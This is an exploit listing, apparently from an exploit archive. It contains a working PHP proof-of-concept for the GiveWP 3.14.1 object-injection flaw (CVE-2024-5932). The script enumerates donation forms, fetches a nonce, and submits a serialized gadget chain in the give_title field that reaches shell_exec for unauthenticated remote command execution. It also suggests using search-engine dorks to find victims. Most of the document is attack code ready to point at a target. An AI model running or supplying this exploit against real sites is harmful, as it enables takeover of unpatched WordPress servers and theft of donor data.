Share
## https://sploitus.com/exploit?id=PACKETSTORM:212928
=============================================================================================================================================
    | # Title     : GiveWP Donation 3.14.1 PHP Object Injection vulnerability                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://givewp.com                                                                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:  This PHP script demonstrates a proof-of-concept exploit for a PHP Object Injection vulnerability in the WordPress plugin GiveWP.
    
    What the script does:
    
    Sends AJAX requests to the WordPress admin-ajax.php endpoint using cURL.
    
    Enumerates donation forms by calling the give_form_search action.
    
    Selects a random form and retrieves its required nonce/hash via give_donation_form_nonce.
    
    Builds a malicious serialized PHP payload that abuses unsafe object deserialization chains within GiveWP and its dependencies.
    
    Injects the payload into a donation request parameter (give_title).
    
    Triggers deserialization during donation processing (give_process_donation), aiming to execute a system command (e.g., whoami) via a gadget chain that reaches shell_exec.
    
    Outputs the server response, which may contain command execution results if the target is vulnerable.
    
    Impact:
    
    Successful exploitation can lead to remote code execution (RCE) on the vulnerable WordPress server.
    
    The attack requires no authentication if the affected AJAX actions are exposed.
    
    
        (Related : https://packetstorm.news/files/id/180463/ Related CVE numbers:	CVE-2024-5932 ) .
    	
    [+] Payload : 
    
    [+] Set Target : line 17
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    // استغلال ثغرة PHP Object Injection في إضافة GiveWP لووردبريس
    
    function send_request($url, $data) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
    
    $target = "http://victim-site.com"; // استبدل بعنوان الموقع المستهدف
    
    // الحصول على قائمة النماذج
    $form_list = send_request("$target/wp-admin/admin-ajax.php", "action=give_form_search");
    $form_list = json_decode($form_list, true);
    if (empty($form_list)) {
        die("فشل في جلب قائمة النماذج.");
    }
    
    // اختيار نموذج عشوائي
    $selected_form = $form_list[array_rand($form_list)];
    $form_id = $selected_form['id'];
    
    // جلب بيانات الاستغلال
    $form_data = send_request("$target/wp-admin/admin-ajax.php", "action=give_donation_form_nonce&give_form_id=$form_id");
    $form_data = json_decode($form_data, true);
    if (!isset($form_data['data'])) {
        die("فشل في جلب بيانات النموذج.");
    }
    $form_hash = $form_data['data'];
    
    // تحميل الحمولة (Payload)
    $payload = 'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";' .
               'O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{' .
               's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";' .
               'O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:12:"\0*\0validator";' .
               's:10:"shell_exec";s:12:"\0*\0generator";' .
               'O:34:"Give\\Onboarding\\SettingsRepository":1:{' .
               's:11:"\0*\0settings";a:1:{s:8:"address1";s:'.strlen('whoami').':"whoami";}}' .
               's:13:"\0*\0maxRetries";i:10;}}}}}}';
    
    // تنفيذ الاستغلال
    $data = http_build_query([
        'give-form-id' => $form_id,
        'give-form-hash' => $form_hash,
        'give-price-id' => '0',
        'give-amount' => '$10.00',
        'give_first' => 'John',
        'give_last' => 'Doe',
        'give_email' => 'test@example.com',
        'give_title' => $payload,
        'give-gateway' => 'offline',
        'action' => 'give_process_donation'
    ]);
    
    $response = send_request("$target/wp-admin/admin-ajax.php", $data);
    echo "Response: \n$response\n";
    
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================